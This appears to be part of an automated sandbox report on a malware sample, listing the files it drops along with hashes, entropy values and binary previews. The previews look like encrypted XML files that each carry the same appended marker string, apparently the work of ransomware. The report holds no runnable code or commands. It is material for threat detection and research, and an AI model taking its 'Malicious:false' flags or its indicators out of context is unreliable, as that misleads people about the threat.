              Preview:<?xml...".W...M9+..#.hg.G.#P@..2...)w..~..93D..f}o...`.ei{....Q....5.]..>.......P....>$......7G.T......~.?M.w.).[M.}"...C..i.=#z...L.f..d...=..b.1?....@>...nT.....d.u..e.....a...Mz>.x..k. }.z$b...A..AC.;. J......kWL.)<Ff3_..e....AA.!G..7....."....8..!....`......V.? ~..v>z....R.X>._..+..X...Q..=K...D\..w..)(|.lj..rTh....).-.Qn.}uU..7d...5}.#I.K.....{.\d.?.A.&..`C)....b.N..F'.....o.I.VX}..3.E_......'..WA.#&.Aso.=. s............o....].&..|M^b.8..........q..`.-~....a...P...T.X..7.Fe...m..l..B..agE...........`.W..#.}..7.).g...v..M.!."_Z...R.p-\...).F....]-...U.....Q...e.q|.....a..l...W...s..5..T.?..6.....6....Z....$...../..........BV.lU.8....Il..`..#..=....'...HPY......[4..%.......gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):748
              Entropy (8bit):7.720791302367758
              Encrypted:false
              SSDEEP:12:z67ckplXf1xqIVfPt8lKyj3z9gIKSQCqrpL/72hsT3jzNc2VzMLu1l6x8ocGDdx6:+ckLXfSIVXwxdqrlq2TTzCwQyxolDd+X
              MD5:123DBB45B20A5E4578B73303CA1D29D0
              SHA1:528CC5DE4E3088576C515512DC36DBADD8CCF2DA
              SHA-256:7F4B17957F0CDDEAD905F48C580C3A869C105BCD75B7E465E9CD1797671E74B5
              SHA-512:8A84F8F0596D079B75DB5F6BBDD4584F0B6CFF5AD54B22CBF5EF29964426CB47E6A95EF02091D67B07BB50133678B3EB536FB7368F58C9A4E2A7A2BDA4B5382E
              Malicious:false
              Preview:<?xmlt..~.~f..W..........\./..(..V..w.P..P...%.....6.0..0cj@.K..z...P}....f.%..(.o..g.(.(..H..}.b..q..(.?X.4..=..z.^.-.V.;.-.k".8.v.......A........?.4...|.=.....R,.?q.....V....JK..\.N.q..~3.D..)..uP4...zA....(...0...W.....yM..AQ...e^..8.B..:..G.w....]...r..#>VJ*..N.%..p....N."....N.......o...lXz."..T%...Oq^...G......B|..3.....w....>..p......{...r_.7........\.........G.N..H.....#..j_....R.\...E0#...[I.9.>..6.?..G...M. .BD<.m..X'Q...k,..F...b..|.abO.lS..s...Q.b]....nf.X.{.k........9j.C.O..n.gJ........G.z.....q...w..N.u5H:........-.Q..1..)5..j{..*&...G?#.\.s:H/..-M'.@.....Sb...2p......7.j.~].D,..@.z........xn.f%a.M..Y.......u.<JgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):804
              Entropy (8bit):7.710340156241148
              Encrypted:false
              SSDEEP:24:GQ2zizURAvRgZwAeSKxCkIPgQjHS8ZK6PBfoFmxgF/RV0d+bD:GQ22mZwAbKxSPfS8nLAbq8D
              MD5:4C6A19F275A6C2E4129DB6E573633AC7
              SHA1:345089CE08D76E8B5341F0F9E8E85E4EA89F9623
              SHA-256:F70144744D4B5336837E7E596246EB33CB7B550710090048B81F670EC8460D5A
              SHA-512:558401FFC215DD25F82686BCA6AC673632E138148333CFCA7D955FBC0BE157FAD736035E3FA4C67133AC1D8398A6095A3DCC2F277D6A38B1DCA332BBF3B865EC
              Malicious:false
              Preview:<?xml......mVY<B./*.V..t<F..kYQ*QV..f.....}.....J.......>..?.a....=Tc..^...,2.n..<T._.sj....x....,#Q....A.X....Fx..a...Y.\..w7..S]1.T..QTHM7 ..v.cj.a.~zS3K5.Nx.(.,&..&.\~.8..z..O.z7.].^C.aw]....$.i3..'`.O.._..$..p..>GY=Z&...{..CB,....>.l,:..}.D..~:..)......K...<..0...~.L.......|1.B.J}.%+.6l.W..<.#.....e....o..o5.e.....8ws.&._...E$.V...........]..D].MWAX5$..0.......'A.....*....`.n......A.'.c.{.nL>..;....N..5...?.....7..Dj9a.^.(.....&.@...1...b.T;.zg..#)"...VU..w'r.GT......$a.+....y..vu.8z.....==....}e....Q-~_!.~.'..BZ..=...[..P|.w.9!.6.$.....gn%...:q#4.....8.. @..v-.@.P....D...,.I..}2.U.Ux./........PQ.".%.b..L..7...`.oRv..,.L.Q...K.(..l.<..c..Me.";...V......+...a...K..7xt.y..3.8]YgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):965
              Entropy (8bit):7.761465862912942
              Encrypted:false
              SSDEEP:24:dnZP7jnl4NgQkOdzZ5sU6AD5YthbptpeT40HY3p/rzEd+bD:/7rONV1ZD6NeMLH68D
              MD5:604AFBCC56954CE6A553724C19B2C8B0
              SHA1:ABE23C566D2E623DB8EE07A508CDA5EED0C63E2E
              SHA-256:08BF00BB118D22A85FEBA84799244E40229142886F607DD5C67D660A966A2B87
              SHA-512:6BE94CA2D7BF34782714422976A1339C89089C4D01683FDEBE7F4F8AC5B19B54FE3BF8684AEC37CB13283C03F4466374DD13AFF67C10918DD9A7D0523FC56358
              Malicious:false
              Preview:<?xml..za.g....{..<.B...S.)U..2.~.Ay."I.t...P..D...L.tyB.F....;.....i..3M.i?..f.N..g...&....C.U"5.,.+.nS....a...Z<O.{..3...=..W...wLp.uc.[...).M.B-....Q......*)|....$F.+[&...6..o.4I...)...Hl...S8.W.....c....Xsi].....p..HE....)...v.w.7.Go...]B'...........nZ.#Q.n"SF...U....7a@aZ.......$...9./&{S.%B.^*.p....|.7...=...M...A.2Y.._.....7.3.[.D.m.5.Q.t.........z..c..GE.<..+.;... .:..?.n..J.h@G.4..A...%.3n}......TI../LS.....sKp`.,<C..q.k...z.......Uv.U.....2....q.....JiRa.aO..(...K(..4..64.../CL.*BH..5..qHTB0(....1......f../.1.[..7..b..d..m.u^)...k..Rx....;...{....2.KLb....k... *..tD...ca........_.`.M..f..#..C..@h|...; 3...NH...".8.+m(..4R.-H[.2.-5A@E.?..n_...6.drH.....|.,O.A.v&Ro.....dq...rK..b.MW.`g.......oF.....(.Q......kV+.H4....=....c....u}~b...f.....P.M......Z.y....{.Aq........'...P...OL).H....Oo.E.A...Qs..u....,..t.#.g..0...gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):800
              Entropy (8bit):7.714371604447187
              Encrypted:false
              SSDEEP:24:CqX4+57NAAoi+yIOzsXS64ktgqX687d+bD:Cqo+5RAVyFsEkVKA8D
              MD5:5C0BA6222A46FE738545E763C481A1C4
              SHA1:651E59551D900E9F746428E5A7C2B90D1F35E851
              SHA-256:6BC53193395F3188387F065175BDD606232AC1E4925B0A4B6457884C7252B69E
              SHA-512:3C33FFE7F5C15C9B47438807DF839F105DBC019B43929CB5876F9BEAC3B4CEAF17D4C8963564E3C595E1405DC936883C4C2291BC1E61518B90427CB36C19B091
              Malicious:false
              Preview:<?xml...)p.y.....t...$..w.[...._..8Rh.J..C.M.@.C.}....R.1:..3....P.r.y...a"./..E.5.(Dd...w2e....Iev..m .zK...j.)..~}o!.Vt...r...^........X.:.1{..N"l..fH..d.WU..82>.......>..w....\*..;.....`}.....d.U.W$.hjrL...........s...h........H.].A..B.....h1...x.....e.w4'.....j..Xl.4...>0.z.R.B.3....@.Xc]...pGF...?..V..<k!g,o....M....9.........X..Em..9^T..e..>.{....=..O;.<...|...)K'.}q3.N.~.....iS7..........L|cSI...u>....,>..x..'oGD...D3..F!S...q..L.>B.e..y.b..PwY..}9X...9.....M._..p'.s+.u..4...p.X.....".c*..]4..V...Go..H,...(An3...c.O....2U..K(.$8....U].1G|..X...S*&.5.....0.p6..P....*.Z.X.f...^..F..nB.5...A.g..Y.?.V &Y..5.^.0.P.yP.14is..B../Bw.k.....p...z.V.d...X.q.y...<...'-..I.(.D..BH.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):740
              Entropy (8bit):7.656974735733416
              Encrypted:false
              SSDEEP:12:ga8qQFfJ97gaBVW8ZxBJCQdyKtXc4rCCbardgM5R0YkzYiEkM0wA4gkGnVgLdxan:h8hl3cxyxvTdyKBrlbar+M3n0wA4god4
              MD5:79B73C061DE06F4A10F0150A60B274CA
              SHA1:9B7604E6EFB8CA34A96C698435821457897D92FF
              SHA-256:FC82FC996E1A002F94EC07F46216F52139EAE4BC2789617B038595E70165A555
              SHA-512:55145143F2A6D9C40F72C01E88A985258024B2B6074E6B8DBB1932D7D42A3EA3004A68CA633E1DDEF88F412965259078089FF2D5107104D5F8FDBAD19876153F
              Malicious:false
              Preview:<?xml.I@.....jM4.hzKUd...GI3zo...}.D....P..1.:.....({....-.L..@ ..J.E...K..O...Jj>.?.k{j.%.I6...V.q.-y}.&`.1D.7.....Q....6.w......F#...`g..{6|...&.LP....?...+.$...v=..o.].. #*3{8...lG.z....h..K.X".0....B9.....c...y.rZ].. .qqz...|.$.(|.t.eD.."q..J-.y^HW..VZ....?%...}*.J.....9.o....:.*;....zr....?........',I,..9.)?; =....B.8.....%......6.....n...C...gO.U.a...G..0..6i...!.^2U2.x_gt.M..<.R&.Z...L.x.H_B........w.b.\.&.../6..w....yN.>..I..a..[&.SC1...6.Y{.L.1.!.d..,...)....5...&.....^..E|....~...m.J...`..,.2se.....1..t.(:1f&......!1.I..^H.'...O....6w.<6..Ln...Q.e8...O;..VB8.7Q.3.G.8.S...).N$:%..^El$....XT\.c..|...Y...K.$4.|.tgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):819
              Entropy (8bit):7.731147977639791
              Encrypted:false
              SSDEEP:24:TXnWSLB9lfg9R5PAVWM3ONZtoP5asd+bD:rLyzPKWM+NZto8C8D
              MD5:05082A42ACED4D8AD6DFACDC197E1CF6
              SHA1:C8354E7702A2BA81639885513D79C2FFF6FB6DFA
              SHA-256:603E532CCB759396BE5B2D355CA466F05EFDE71109219682807BC701F7546ADB
              SHA-512:5D44EE0D9B43D851EE60DDFDA5C76287507C9B6669F143F08B1B4A310F07FF7A6614B5652F967A5893CD099F242B997120B1F16F81314CAC3208EE7851722C75
              Malicious:false
              Preview:<?xml.....D.....m:.oA...../.......j.D..)c....~u.....HX...E....m.?R...................[.[.l.+6.1...O] b.....?!T....t.*..s..A.......\=..<.<.a.O...d..^.7.......x.DQR$..#P...>....5' 1~.p&6..g+.1..p....!.RC..,\...P.......I*...[QL....}p......P..%.:.8D>..&...,7...._.23.a.0...kf'.....=...1U...pq.V_m0N.].%..Wk.{..Cx....S_...<.1....l....<.s...........%]..:.2..P.Y...._g.7EIm..y .*...;eV.Vz..'.t".e..U.".I...e..O{..#".#bh....u4..`t.f$AN.k....,...z`....]E..Yq.4ejyM....F\]n.b..:..{p.h..u.TX;n......~..0$.p...man.........1.7h..b.w.pq.L|...h...L&....;.h..[.Ar#O..#..Q..."...T.`I6..2{.c6>.<r&y}%.s..q.z..'l..j.Oa.E~Y..VD.:..[=.A.r.?..I.f.$.6.n...!{i<YpE.\..^.s.k...{Nw...=.K.RB.#.8..).P`...[I.j..k...!..P.....+bQ3.....L.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):760
              Entropy (8bit):7.698890540935789
              Encrypted:false
              SSDEEP:12:gWoB2HvrZ5z910VKHUVjkWGQtWpziM5NXXPIkkSoXUxMCLQJgcXxgdxa3cii9a:gEvbz910gHpi2iTEhhQxgd+bD
              MD5:3DAC05B804FD8930A27BA8AB1A07D4DF
              SHA1:363AED35AD5A0A2DD6B59FDC839CC6A60A195BA8
              SHA-256:CC014602D9D604132EDCC46FA71B0CB2F7DBCFFA01507ED06EBCE8C1420F0A46
              SHA-512:FD7DB4832236BA6F0B7FEB3E0C5034C628AA3338F4DA89B3931CD16462A206FDB589B60CC63F7CA3D1FA8119A824FD5AC1B7643CBE2417E8FE7D635858B4A11D
              Malicious:false
              Preview:<?xml..\P.....\.kym.8......'..S.{!....{.V?M3n.......|.P;.....%C.?qY...K.m..Q.....1W8DtU....>......t....Q.OS(Y......?.:.Y!q...e!.?!.......+&.......%...b.(.Fg.b@..#a!.b.....3`]......^!.dQ.....)..l...'.......0/.)q.PA....@..T....W2J......<.1S.P.C.}..-Q%..y6a.a.3..3..o.....vN..x:.FU....Z...B.f....oa.y'.^.\...6....49...y.]...Z.w.pH...R..l.<..fQ.oZ.U....?..z.e.E..v..`.)>=.!^...../"..X...h..q.f.3.@.l.....0 .r...AE..:W<"9.1V$..F..a.Qk.........~..`<m..J@?[.(:.x..td.5.!i...!.%...B......9.....:.....=...wkh(n...o...k...f>q...ER....j.,..gMr.`....!........K.B|..,...-..Q..5.....8......`.4.o )..J.l.v/b;.lH0Y..j...[.....<... h.f.>(..OxcW.n.~..~!4.>.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):819
              Entropy (8bit):7.751694712763109
              Encrypted:false
              SSDEEP:24:cB4WYWpR9lX9YNX8KV+e/uIp6Fq7fQd+bD:cB4WY8R7i8Kh/uIp6UbG8D
              MD5:1727B5AD695742F1F20DC1523C9E2DA5
              SHA1:266869BB2749FB5EB46E96E5CFCFB9A673E11E9B
              SHA-256:C74FDA764568B82A2F39609FBDC7D2B70285EE68C95E3ED58E2BA2E55C3F0838
              SHA-512:39422C444F85B2B61950552A03144D188CE1006CC038626F4018AB77283BE4C2483CD304ED3CC3F81043CF13D2D68D65E385DA677C94E7C135866EF44CAFBCCC
              Malicious:false
              Preview:<?xml'@....+.F..^C......3....bd........h,....yN..*uE..Sr.....?..`.1Uf..WE&.T....^;pg;...W......K.)......mp..\H.9..\T.!.. .......7..lC2....G.N....^7e.....-.H..j.....Z.NN..^.w!.`(k...3l.y......vN.o|b...ZM.iW..`8..N+..>!.g...8........i..uY........b......W....%......!..;....~.5..c.(.ogb,..|.....;..]=.........G...LO\..2b.8Lk....8h.{.H.,...|W....B...........E................j..@..|.;.,..G...9w.OF...0.\......,g.e..Tl..f..6.R..N...99+i).R|..f.h....4M.,k.....Rg.Kt.~.{.{4..o.>..\.h...}..LX...I...n.......?|.A)....Wta...w...T.Q...3..5.......s;..}....S..."c.......6......._.%uvE....A..;P....<.4.m7... ...R`V.....[.E.?n.O![l?.Y'.-...m.0..1.23..Q........~..5k...^..&.%...x...Kw...Vp..6..IC...."2.*$.B..6p.....w].gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):740
              Entropy (8bit):7.695868121754853
              Encrypted:false
              SSDEEP:12:o0ES6m9oqdB4bhYiT+804buDUsmmzsHE5kxVMeEEHzvrOGDOhQ6MJbzK7yKdxa3X:f9vdUhY+Obg5DQkx+eEE7q7h0JKld+bD
              MD5:870F4D4A934C474FE7AC2CBE0144D174
              SHA1:9E491CFA4B46B3B3B2CB49A577479A24B9A9C494
              SHA-256:6BB97AF4C23353BF23D4119B140FF9E0E71A961EED6478BD357AA65EBCBB91A5
              SHA-512:AEB9FAC89F00105C0A897B3D43D71B7325743646EE9EC54A2181A3E3DC612365D833A546C3D71F840AF2CBE9C19F658F1C721C6A3B15D1D76C071CEA3AEBA424
              Malicious:false
              Preview:<?xml..y.T..qr...0..C.P.....k.@ck.cHMdI....0.>...h.fd...._t...).xNi...fM+..0..i....c......[7o.....7.@&.x.p...........<...o.....~g+M.XQ.._.K.'....?^......o.."}..@...[;:...DS)....V......h.\..i:.......%.z...].m....E......C..FMq..T\9..h.U.7...Xo....*6.}.O=...n..."mPw.c'.Do.K..F'\....O..v.e.o=.f..(...L.q.@..y4..id..da..'..w.R..fi[u......I...5H..gs......FVA..#.;..S.8a...L.....x5....pr(d.........t.jz1..P.......M...(.9.1u.{.,N.S...R6..!.-x....Rr.w.a^..k@...4..eP.2.x0-..c ..4....95q.mw./......^........$^..Z3....:wl..g........n...F....f.=q,}$Im...|B.5h..23.....h$!{..5....tl..6...ur.^3C\.7`.3O.N......(e..J"g.@./.g.......MgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):802
              Entropy (8bit):7.68723488188925
              Encrypted:false
              SSDEEP:24:Ah3AyQ5kLnMFoImsm42BZRC+flD+juPcd+bD:Ah3AyQmbMD2Lb0jP8D
              MD5:59916E4F1848351B66996245BF5B9035
              SHA1:0A10B9C03B5B88ADE4BE9F871427C1C4A5C6A24C
              SHA-256:7931A656F860D5CCA6E4E141C6CBC26C6BBDE4130DB0E6FEEAE134D712DC4D78
              SHA-512:67D492FE889490D35A8ACF97130D0D180914B513F73FB92BDCA9425A053F07580914423011F0EF23A73826C7FD8DAB9C4FC8B816804593F564AB3FBD0AE3F1D7
              Malicious:false
              Preview:<?xml}....S.rL............S.(`.6._..n`.....U...cW.-....).QmM....~...@......N...9H<L..&.k....Bj...[.[,v....|..m./...dc.L.3..Q'o.f..L..B... ..5..=.T....W2%......G..T.th..........R=GK.*.".....J..+.[..\.#%.+....../N.9..ir5.lw.qB....y]...".{....e`....X...._e...\...8....\R..-.r|..EkY.V#.:.R8^......Z............./q"..........{.Fh.xi...I....B..,.b....q(...U..b&...t.g.h..S.db.4..kK...:hb{...m..iX.......8...T.&..-/.... ....<..K../..5{m.(.r..L.qN..[._M?f...{...}..p....wC...L7N..=8.E..Q\.........b..s..n..s{.1!.....0.y..,.h(Co...#..Y}...........F.(..9.....~.:....g.<M.g... 7.2...Z79k..q..KW..J5..AQ.h.x...q..@...sV.....372^._.6g.y.<t......@z>.V.B...Ly........q. x..p..kV....#&...0<...8....z.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):748
              Entropy (8bit):7.660359345898917
              Encrypted:false
              SSDEEP:12:VtVUQnuKVR043fh9N+iRTy77LKUFkPQWxbosOduY89f/VKdxa3cii9a:0yRpHoM+77LKmkPQgXYYwd+bD
              MD5:CCCCECF749996C9A79DA8260E18A41BE
              SHA1:6D5F308B300C9FC4035BA30C90B8532D0D883A90
              SHA-256:5B2F47902D1872A718B4F24FF626F42AC24E6D5B0791B6D172E58765ED645483
              SHA-512:6C7992F4EDC994F559001E089608E499F5FD454787508EF7E5FCE8DBA76CC1048815DD537F2E878A543709BBBD4CB4090B3BB7E57BEC934D4802B014F118F220
              Malicious:false
              Preview:<?xml..Y..L.L<n..L...(.....*.}.3li.<..%..e/....y.....nd=.".z*wb.Z.+8.D.i...>..$..Z.T.I...^'s..9.6.....^....z...O.Y_....<.m.:..gQ...cj.O.|q..C7M._..{.B...z........6...@@E. ;.Xg..%.w.....H.o.9...Wp..FR....d....EX...5....f........:D.....w...dO.6x*....(1.V0........H.. ..^......E..p.LG=&.JV.v.=.k..}W.6....@.$..Ev...&...wT....1.B..........%V....c.$.*...8(.....r.K.p G|.. t~M.v....&c......rG..g.I.R.#.$i........E..%...x.b..2.k...f..E...Q...G....0i..........q.T.yC..x....7..E.F....S\.....B.....;...~...c.-~.M........@...>A.c.?>....xz.....^|3.(_...!.l..f..v.}...c.,^z2...Q;...cO.Q1... .Z?1....T(t.u.e....5M.xo...\....wR...|.i.......L.S.g..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):810
              Entropy (8bit):7.741492324804782
              Encrypted:false
              SSDEEP:24:usFD6277lT++nCHV7g/spRFviXm3fd5VEd+bD:usVlT++nC9mspRFviEV5V68D
              MD5:4F865202643C4EE11068271126369031
              SHA1:8A9015BCA00019CD60589DDA316E02401F759D48
              SHA-256:4FEF3574A5179A0D742CC67A985561145836E68C56920952EB328F103602F246
              SHA-512:BDC2C039E15647B65182523F3A40C8D0B92FB330007A6626566B0FD4F4E00AB733D9423B7442777E0E438A013A0B935149EAD8FD7142FC4C527E95FB0F184F55
              Malicious:false
              Preview:<?xmlV@...j...%..1x.,........8.=.....g.....r..De].m......ni.E.....I.`.Z3]..t.s...N...lt......C\"K.@..... i...*..&.B.mV. ......kq....Y`.y...[.$n@:.p...w!.68...uE#A.|..0..0..hk...q`....D......G.!tfg.v..AE.I.M.....L.~.A..d."...R.00......X.uO0.F1......(.>......(..E...0..5.h....W.!.Gea..s*.$..pX.>$....** .K^.8@i.>..G:.<w@.y..^.v.d......yw.....~..........A8..,fu.Ff..=.g.S.....T.Y..K..!D../Sp).*qR.q...#1e.vg..e.WT8%l.rT...W.. .".....Q..V.T?.um.&N0O O...[.x.{.x.N..,....NeG.M.V.x.)&.7.#./..[.=K5Y,..h.....Y..h.fF:.#..Y...v.6l...X...gR....Y....m~. y<.'Vh.....p.h..I.2>i..|..9......}t..:.C.\..Xe..k......S-..E.+.q..i.wk.h;yge..r..[r.R/...To.O$R.}2.......I2.........c....W..'#...V.mf...}+3......t^...LiegigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):797
              Entropy (8bit):7.683536673339221
              Encrypted:false
              SSDEEP:24:28ok4kXO0lNmIkvawtC2+FCNzghnzY0+/d+bD:Zok4GlNUvawt5zghnUf18D
              MD5:29A82D0968CCDACE7EA0105C8999B20F
              SHA1:3EE8A35973EFBEECCFCB47833015152F99C280DB
              SHA-256:437A5E06AE757F82ABAB78C1E3D55AA8B00A5DF251CE9BD4DBDB4CD743644DAC
              SHA-512:34F02D010EDF8374DBF7279DFFE0E8F2998A4CB1FF012A4C6FA38183FAC73C0B4B9789574A5DF0400F999E8295464D3FF27E902238F0E76FB0E12929D6882608
              Malicious:false
              Preview:<?xml4.j.K...Qn...=.N.F.R<..P..;......T...B..J....s.g..vGx....vU..`.....^...#...(Z.3.R..?o.K...@..zCOo.Q.....[...........x.=.{.......hz....4...#=........B`{.}.h.uC.0.k4.m.....q....3..B..6....@Tt..!b.$aG+.Y......@.nc....g..2.m........F...i,@.;K...HB......O....5...Smd>$..3......(..=."zt..'.S-(F.'..F..T.y3..Q'...m...XW.0r2..'.I~u..c...`E.N..g6..vH?...H.x.P.8...;..3....#C)...+...4Kf[.Eqmx.W!...<2}..`>YY.!9.gG(.1.Y.ZW.)#83}..T...8..U.I9.k..'......?.Z.............u.7.c..._..{...,S...k.....;.kw...|Y.q...B......q7B..OW.0..p}.....d......`b.F.k..."....c.+.e.c.c$..]ru./|.....Vqf..i#.x*..Zd.7.T..497.s.DM.n.l)..Z..{......8.$.....0."./..R.N....t..7'...n.,L`.c.p.)J.....2.n$....Z...T....r.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):827
              Entropy (8bit):7.725364211449349
              Encrypted:false
              SSDEEP:12:Sup+/kjPojgwutfwhXk4tjqYNJwXztsMKy4tFjks4NLIla8V9znhDb4flHD98/Va:/KktfU62MKygD4VuTnWe/Vfd+bD
              MD5:DB34022817AB8822AF052F1D694FD675
              SHA1:C692A0D42546CA4A5A3D312F495CBD2D5FC63559
              SHA-256:7CC1895E49C1B6B75B2BFB6C6CEA3E4EDE60D6BA3D136A911576F8D2307F7190
              SHA-512:77BC076CE3C3B5AD86D615FE4CDCC9BE39D634163723C310B55697FB4A9E357926A3AF765FD6E5F73221B2F4BC2A62A200A0B4BDA325EF7D4F63127FCCA4709C
              Malicious:false
              Preview:<?xml.g..x.....F0.p.N.[~S.~..]..0.....{....Rq....NJq.R....|f?...NH..#.^I...j......?.R...)Fq....l.S&.1.9.@.hL...\BX....W.5H).=....n(..K\...K.dV.......LxWG.........`S.`a.F......(Y...9.-.>..'...U..q.qXd...G...F..........x).?./.V?..P.....#n.....CXw2.<F.Q...7.......{..K...Xb.cA....."B..._.*}5.an.[.X..A..._9.Ck.;*5..*....`_DQ!.."n1S~..T3.m4doH...'O.~..!-x./...;2..M..-?^...H..3A...]2.[K...hZC+..4.!...+.M...o.%.~.\.O].w....fr5..z...ZYO..Z..I...$......D./J.@a!..,G... ....wZ....Nvx....{'..6.45HF.k.k.....N.....`1!i^..mR%..:.d......z.A.....LL%.....yU<..0.....Y.B.<..%......A+d^..+.!.X.l.x...M..c0...r.y.t.1.+...[...f6KC.M.Xb..<..*G.&\.h..:.&....y4DP....4..E.T.E.......ygd...eg.<...J...Y..C....A..7Lr.....g......i!.....RT...gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):752
              Entropy (8bit):7.7343508000627015
              Encrypted:false
              SSDEEP:12:gqV5vtb9HpNyr2+AUHcx+yux7pkowE4pFnLx5z9K0OGzO6TlJztrRrodxa3cii9a:gqHfHM2+jcx+yuFIE4bFxY7GzOAlJfoy
              MD5:DF03405EB173B788FFC1189E7EDC220D
              SHA1:F9DEC8DBB464D84D9F2AB5C158CA482F8823120E
              SHA-256:EDB33BB646C2E28CBB244722CFB7FA85AFE271796A4996B47558D26351306E10
              SHA-512:FAB02E5C72B039D03D953C61D6F18B5C8C9B40F90324FA9237EE257EA3D3E1DAC481CE40CD5FD0BDE901019A7768060319A59E8B8A74151479F3888D92E57B1D
              Malicious:false
              Preview:<?xml.b...;..OM.h.{W/..N.......k.2..vl..G.@hX....[. `..<#..sX&...b/.wd.L.....0..v+e..{....,........lU.R.7..`.<?I>_..+....;.w...+<.hB2.7..0....^....@.....>d......^.q,..u......4jL^..9.:Zrl..9....c.C.Y.Lhm..c9h.j..nNl.k.YX./}9Zt.....)#.$..4^.GJ.....0..M..\..`.?|...$...(.g.":T..S.W........^....i8....}....>......|.).2~lCE\.w..o._4)a../.V.....OJ.>.n...$..F.lIx.%......1...Y\...W.|....d=Z...j5<?.(.{......c....B.o.........BZ.N.j.1._..rI...).|O.Z4$%...>..W....o-xf..&...,..|....R.1....`W...ooM2.s$.D.)...G.G*..b.s..}.:r..-.R./...aT.#.b..<bA.]rN..a%X..n.).#..;.a.-.T.'..K.v.w.y.a....29.....Da.(......4.^.....o..q.......el.......G.i...`mD....gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):805
              Entropy (8bit):7.75874434054589
              Encrypted:false
              SSDEEP:12:Zg58Zta4ChB69n2ihi9DOiSmJPCABl7xzsaWaDHm+ewxDSJVOnn0d1FjRgDedxan:aeWKH49SiSmJ7fDdDG+PxEYEPjbd+bD
              MD5:F7F1663E88E1E6BE247BE1FE96EC7B4B
              SHA1:371FD6C612286A285D2A9D5E2C96F6BB95533D3F
              SHA-256:D6D4DB31FFAA19188A02CDB465D3FEA2DFE26DCCA048C314916F9B7AF7C68D18
              SHA-512:B3A013415CE10716D7B3EF7DD26F627B3AA3410449D976BDC063A3DBD26F63EBD91125115BE23F4DF39313B2E10D41E546EAA3DB565D0EA0D6AD404F129E6350
              Malicious:false
              Preview:<?xml.V.i..&8....T.~W... ...a.m....../d.'T:ay..../.P..\..r|'......X..M\.....<.vI<..V6.k`2.ei...(..,...!t.].*.....D..9.....<Y.z0...... 1k.cV.vK.;.b7.+[..<!t.97].\X..j..k.E.....n;.).........`w.&..q;...N.Kd......H....k..X0.A9j...k.L...VZ.0....O.DU..|.L.#.{......A.-.+$B..L(..9.....q(.,...9G....8..*...'}w.~.^.L..[.X.Z<..p..#..+...~.o.L$.U.9...IA._.G....K*..A.M.W.ms45I. .M.....k....o...&......K..h...n>8:]......8e...^....g.z.$.."......d.....P..L..P.nj.G..b....H.oON.......|....}4-...R..f.Hy...6........M..<..U.a&.v.j.bC.....]u/?u...tFZ..Hgc?.>N.g......W.8 -'{Y.....0.G.Z.+.>..g......k...W......F...)..w.....q....b.d..A.Z.8...f.I(2'.b&....S...".M.J...+..,7.0V....+i+.....A_r}..5B.ce.6...).c..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
